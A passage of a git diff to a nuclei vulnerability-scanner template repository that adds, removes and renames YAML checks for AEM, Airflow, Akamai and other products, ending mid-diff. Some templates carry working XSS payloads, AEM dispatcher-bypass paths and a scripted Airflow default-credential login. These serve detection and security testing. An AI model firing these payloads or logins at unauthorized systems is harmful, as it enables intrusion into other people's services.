b/nuclei-templates/Other/aem-querybuilder-feed-servlet.yaml deleted file mode 100644 index b180cc6888..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-feed-servlet.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-querybuilder-feed-servlet - -info: - name: AEM QueryBuilder Feed Servlet - author: DhiyaneshDk - severity: info - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.feed' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CQ Feed' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml b/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml index 5e8033b220..4aca466e0e 100644 --- a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml +++ b/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml @@ -12,6 +12,7 @@ requests: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/nuclei-templates/Other/aem-querybuilder-json-servlet-187.yaml b/nuclei-templates/Other/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/nuclei-templates/Other/aem-querybuilder-json-servlet-187.yaml +++ b/nuclei-templates/Other/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/nuclei-templates/Other/aem-setpreferences-xss-188.yaml b/nuclei-templates/Other/aem-setpreferences-xss-188.yaml new file mode 100644 index 0000000000..0873d059c9 --- /dev/null +++ b/nuclei-templates/Other/aem-setpreferences-xss-188.yaml @@ -0,0 +1,26 @@ +id: aem-setpreferences-xss +info: + name: AEM setPreferences - Cross-Site Scripting + author: zinminphy0,dhiyaneshDK + severity: medium + reference: + - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s + - https://github.com/projectdiscovery/nuclei-templates/issues/3225 + - https://twitter.com/zin_min_phyo/status/1465394815042916352 + tags: aem,xss +requests: + - method: GET + path: + - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" + - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "" + - 'A JSONObject text must begin with' + condition: and + - type: status + status: + - 400 diff --git a/nuclei-templates/Other/aem-setpreferences-xss-189.yaml b/nuclei-templates/Other/aem-setpreferences-xss-189.yaml deleted file mode 100644 index 50e7da80ff..0000000000 --- a/nuclei-templates/Other/aem-setpreferences-xss-189.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-setpreferences-xss - -info: - name: AEM setPreferences XSS - author: zinminphy0,dhiyaneshDK - reference: - - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium - tags: aem,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "" - - 'A JSONObject text must begin with' - condition: and - - - type: status - status: - - 400 \ No newline at end of file diff --git a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml b/nuclei-templates/Other/aem-userinfo-servlet-190.yaml deleted file mode 100644 index a18d740fa1..0000000000 --- a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aem-userinfo-servlet - -info: - name: AEM UserInfo Servlet Credentials Exposure - author: DhiyaneshDk - severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"userID":' - - '"userName":' - condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/Other/aem-userinfo-servlet-193.yaml b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml new file mode 100644 index 0000000000..01684b7d96 --- /dev/null +++ b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml @@ -0,0 +1,31 @@ +id: aem-userinfo-servlet + +info: + author: DhiyaneshDk + name: AEM UserInfo Servlet + severity: info + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"userID":' + - '"userName":' + condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml b/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml similarity index 100% rename from nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml rename to nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml new file mode 100644 index 0000000000..4480602e2f --- /dev/null +++ b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml @@ -0,0 +1,32 @@ +id: aem-xss-childlist-selector +info: + name: XSS in childlist selector + author: dhiyaneshDk + severity: medium + description: | + Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. + reference: + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java + metadata: + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe +requests: + - method: GET + path: + - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' + matchers-condition: and + matchers: + - type: word + words: + - '' + - '{"path":"/etc/designs/xh1x.childrenlist.json' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml deleted file mode 100644 index 5af6dbfdac..0000000000 --- a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: aem-xss-childlist-selector - -info: - name: Adobe Experience Manager - Cross-Site Scripting - author: dhiyaneshDk - severity: high - description: | - Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - - https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 1 - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '{"path":"/etc/designs/xh1x.childrenlist.json' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# digest: 4a0a0047304502207b61a53e332c41cf7528557e949b48fd87b864d6be1954c66d7ee9ea2ad4facc022100bb85d07b638b7c81e2fade398eeb93d076fa7792b69cf65f8f31abcaac1a2b45:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aem-xss-childlist.yaml b/nuclei-templates/Other/aem-xss-childlist.yaml new file mode 100644 index 0000000000..5aab3e0161 --- /dev/null +++ b/nuclei-templates/Other/aem-xss-childlist.yaml @@ -0,0 +1,52 @@ +id: aem-xss-childlist + +info: + name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting + author: theabhinavgaur + severity: medium + description: | + Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" + - "{{BaseURL}}/{{rand_base(4)}}

    please%20authenticate

    .childrenlist.html" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '

    please authenticate

    ' + condition: or + + - type: word + part: body + words: + - 'data-coral-columnview-id' + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100ea901d01b02a06ee948fb8452ddf1936c377d4006e2ca155085a17be6a37146502203245bd45cb13c228f5bbd013c7157d8ed9d98e3671068621b999ad3bded15e5d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml b/nuclei-templates/Other/aerohive-netconfig-ui-199.yaml similarity index 100% rename from nuclei-templates/Other/aerohive-netconfig-ui-200.yaml rename to nuclei-templates/Other/aerohive-netconfig-ui-199.yaml diff --git a/nuclei-templates/Other/aftership-takeover-203.yaml b/nuclei-templates/Other/aftership-takeover-203.yaml deleted file mode 100644 index 9407e028c7..0000000000 --- a/nuclei-templates/Other/aftership-takeover-203.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: aftership-takeover -info: - name: Aftership Takeover Detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Oops.

    The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/aftership-takeover.yaml b/nuclei-templates/Other/aftership-takeover.yaml new file mode 100644 index 0000000000..51aa2c439c --- /dev/null +++ b/nuclei-templates/Other/aftership-takeover.yaml @@ -0,0 +1,19 @@ +id: aftership-takeover +info: + name: Aftership - Subdomain Takeover Detection + author: pdteam + severity: high + description: Aftership subdomain takeover was detected. + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Oops.

    The page you're looking for doesn't exist. + +# Enhanced by mp on 2022/07/20 diff --git a/nuclei-templates/Other/agilecrm-takeover-209.yaml b/nuclei-templates/Other/agilecrm-takeover-209.yaml new file mode 100644 index 0000000000..a9c27d220f --- /dev/null +++ b/nuclei-templates/Other/agilecrm-takeover-209.yaml @@ -0,0 +1,15 @@ +id: agilecrm-takeover +info: + name: agilecrm takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Sorry, this page is no longer available. diff --git a/nuclei-templates/Other/agilecrm-takeover-210.yaml b/nuclei-templates/Other/agilecrm-takeover-210.yaml deleted file mode 100644 index 9f6a9a36d8..0000000000 --- a/nuclei-templates/Other/agilecrm-takeover-210.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: agilecrm-takeover - -info: - name: agilecrm takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - Sorry, this page is no longer available. \ No newline at end of file diff --git a/nuclei-templates/Other/aha-takeover-213.yaml b/nuclei-templates/Other/aha-takeover-213.yaml index 2cd6bcb83d..649b36b6e5 100644 --- a/nuclei-templates/Other/aha-takeover-213.yaml +++ b/nuclei-templates/Other/aha-takeover-213.yaml @@ -1,18 +1,15 @@ id: aha-takeover - info: name: Aha Takeover Detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - There is no portal here ... sending you back to Aha! \ No newline at end of file + - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/aims-password-mgmt-client-221.yaml b/nuclei-templates/Other/aims-password-mgmt-client.yaml similarity index 100% rename from nuclei-templates/Other/aims-password-mgmt-client-221.yaml rename to nuclei-templates/Other/aims-password-mgmt-client.yaml diff --git a/nuclei-templates/Other/aims-password-portal-222.yaml b/nuclei-templates/Other/aims-password-portal-222.yaml deleted file mode 100644 index 800dd21cad..0000000000 --- a/nuclei-templates/Other/aims-password-portal-222.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel,aims - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aims-password-portal-224.yaml b/nuclei-templates/Other/aims-password-portal-224.yaml new file mode 100644 index 0000000000..62ffc3aebf --- /dev/null +++ b/nuclei-templates/Other/aims-password-portal-224.yaml @@ -0,0 +1,32 @@ +id: aims-password-portal + +info: + name: AIMS Password Management Portal + author: dhiyaneshDK + severity: info + description: An AIMS Password Management portal was discovered. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + tags: panel,aims + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/nuclei-templates/Other/airee-takeover-227.yaml b/nuclei-templates/Other/airee-takeover-227.yaml new file mode 100644 index 0000000000..b0ab7e7b52 --- /dev/null +++ b/nuclei-templates/Other/airee-takeover-227.yaml @@ -0,0 +1,17 @@ +id: airee-takeover +info: + name: Airee Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + name: airee + words: + - 'Ошибка 402. Сервис Айри.рф не оплачен' diff --git a/nuclei-templates/Other/airee-takeover.yaml b/nuclei-templates/Other/airee-takeover.yaml deleted file mode 100644 index 3b9c572cd8..0000000000 --- a/nuclei-templates/Other/airee-takeover.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: airee-takeover -info: - name: Airee Takeover Detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - name: airee - words: - - 'Ошибка 402. Сервис Айри.рф не оплачен' diff --git a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml b/nuclei-templates/Other/airflow-configuration-exposure-230.yaml deleted file mode 100644 index a715bba8ac..0000000000 --- a/nuclei-templates/Other/airflow-configuration-exposure-230.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: airflow-configuration-exposure - -info: - name: Apache Airflow Configuration Exposure - author: pdteam - severity: medium - tags: exposure,config,airflow,apache - -requests: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/airflow-configuration-exposure.yaml b/nuclei-templates/Other/airflow-configuration-exposure.yaml new file mode 100644 index 0000000000..f4ae81eff2 --- /dev/null +++ b/nuclei-templates/Other/airflow-configuration-exposure.yaml @@ -0,0 +1,16 @@ +id: airflow-configuration-exposure +info: + name: Apache Airflow Configuration Exposure + author: pdteam + severity: medium + tags: exposure,config,airflow,apache +requests: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and diff --git a/nuclei-templates/Other/airflow-debug-233.yaml b/nuclei-templates/Other/airflow-debug-231.yaml similarity index 100% rename from nuclei-templates/Other/airflow-debug-233.yaml rename to nuclei-templates/Other/airflow-debug-231.yaml diff --git a/nuclei-templates/Other/airflow-default-login-234.yaml b/nuclei-templates/Other/airflow-default-login-234.yaml new file mode 100644 index 0000000000..0b0bd22212 --- /dev/null +++ b/nuclei-templates/Other/airflow-default-login-234.yaml @@ -0,0 +1,57 @@ +id: airflow-default-login +info: + name: Apache Airflow Default Login + author: pdteam + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork + payloads: + username: + - airflow + password: + - airflow + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Sign In - Airflow")' + - 'contains(all_headers_2, "session=.")' + - 'status_code_2 == 302' + condition: and + - type: word + words: + - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-default-login-235.yaml b/nuclei-templates/Other/airflow-default-login-235.yaml deleted file mode 100644 index 7895e5fa0f..0000000000 --- a/nuclei-templates/Other/airflow-default-login-235.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: airflow-default-login -info: - name: Apache Airflow Default Login - author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - metadata: - shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - type: word - words: - - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-detect-238.yaml b/nuclei-templates/Other/airflow-detect-239.yaml similarity index 100% rename from nuclei-templates/Other/airflow-detect-238.yaml rename to nuclei-templates/Other/airflow-detect-239.yaml diff --git a/nuclei-templates/Other/airflow-panel-245.yaml b/nuclei-templates/Other/airflow-panel.yaml similarity index 100% rename from nuclei-templates/Other/airflow-panel-245.yaml rename to nuclei-templates/Other/airflow-panel.yaml diff --git a/nuclei-templates/Other/akamai-arl-xss-249.yaml b/nuclei-templates/Other/akamai-arl-xss-249.yaml new file mode 100644 index 0000000000..9d1034a158 --- /dev/null +++ b/nuclei-templates/Other/akamai-arl-xss-249.yaml @@ -0,0 +1,31 @@ +id: akamai-arl-xss + +info: + name: Open Akamai ARL XSS + author: pdteam + severity: medium + tags: akamai,xss + reference: + - https://github.com/war-and-code/akamai-arl-hack + - https://twitter.com/SpiderSec/status/1421176297548435459 + - https://warandcode.com/post/akamai-arl-hack/ + - https://github.com/cybercdh/goarl + - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US + +requests: + - method: GET + path: + - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '">' + - 'Suggestions for improving the results' + + - type: word + part: header + words: + - 'text/html' \ No newline at end of file diff --git a/nuclei-templates/Other/akamai-arl-xss.yaml b/nuclei-templates/Other/akamai-arl-xss.yaml deleted file mode 100644 index 1606999e41..0000000000 --- a/nuclei-templates/Other/akamai-arl-xss.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: akamai-arl-xss -info: - name: Open Akamai ARL XSS - author: pdteam - severity: medium - tags: akamai,xss - reference: - - https://github.com/war-and-code/akamai-arl-hack - - https://twitter.com/SpiderSec/status/1421176297548435459 - - https://warandcode.com/post/akamai-arl-hack/ - - https://github.com/cybercdh/goarl - - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US -requests: - - method: GET - path: - - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '">' - - 'Suggestions for improving the results' - - type: word - part: header - words: - - 'text/html' diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml new file mode 100644 index 0000000000..ea09ed84de --- /dev/null +++ b/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml @@ -0,0 +1,30 @@ +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml deleted file mode 100644 index d3b9faa070..0000000000 --- a/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alfresco-detect-259.yaml b/nuclei-templates/Other/alfresco-detect-259.yaml new file mode 100644 index 0000000000..bb8f41ee52 --- /dev/null +++ b/nuclei-templates/Other/alfresco-detect-259.yaml @@ -0,0 +1,33 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + severity: info + tags: alfresco,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/alfresco-detect-260.yaml b/nuclei-templates/Other/alfresco-detect-260.yaml deleted file mode 100644 index 0a9414afb1..0000000000 --- a/nuclei-templates/Other/alfresco-detect-260.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: alfresco-detect - -info: - name: Alfresco CMS Detection - author: pathtaga - description: Alfresco CMS was discovered. - severity: info - tags: alfresco,tech,panel - reference: - - https://www.alfresco.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' - - - type: word - part: header - words: - - "application/json" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/alibaba-canal-info-leak.yaml b/nuclei-templates/Other/alibaba-canal-info-leak.yaml index 69fa26a672..0d04d1e1b6 100644 --- a/nuclei-templates/Other/alibaba-canal-info-leak.yaml +++ b/nuclei-templates/Other/alibaba-canal-info-leak.yaml @@ -4,11 +4,11 @@ info: name: Alibaba Canal Info Leak author: pikpikcu severity: info - tags: config,exposure - - # https://github.com/alibaba/canal/issues/632 - # https://netty.io/wiki/reference-counted-objects.html - # https://my.oschina.net/u/4581879/blog/4753320 + reference: + - https://github.com/alibaba/canal/issues/632 + - https://netty.io/wiki/reference-counted-objects.html + - https://my.oschina.net/u/4581879/blog/4753320 + tags: config,exposure,alibaba requests: - method: GET diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml @@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml deleted file mode 100644 index 23048a649f..0000000000 --- a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: alibaba-mongoshake-unauth - -info: - name: Alibaba Mongoshake Unauth - author: pikpikcu - severity: info - tags: mongoshake,unauth,alibaba - -requests: - - method: GET - path: - - '{{BaseURL}}/' - - matchers-condition: and - matchers: - - - type: word - words: - - '{"Uri":"/worker","Method":"GET"}' - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alphaweb-default-login-275.yaml b/nuclei-templates/Other/alphaweb-default-login.yaml similarity index 100% rename from nuclei-templates/Other/alphaweb-default-login-275.yaml rename to nuclei-templates/Other/alphaweb-default-login.yaml diff --git a/nuclei-templates/Other/amazon-docker-config-280.yaml b/nuclei-templates/Other/amazon-docker-config-280.yaml deleted file mode 100644 index 4eaa175dfc..0000000000 --- a/nuclei-templates/Other/amazon-docker-config-280.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: amazon-docker-config - -info: - name: Dockerrun AWS Configuration Exposure - author: pdteam - severity: medium - tags: config,exposure,aws,devops - -requests: - - method: GET - path: - - '{{BaseURL}}/Dockerrun.aws.json' - matchers: - - type: word - words: - - 'AWSEBDockerrunVersion' - - 'containerDefinitions' - condition: and diff --git a/nuclei-templates/Other/amazon-docker-config.yaml b/nuclei-templates/Other/amazon-docker-config.yaml new file mode 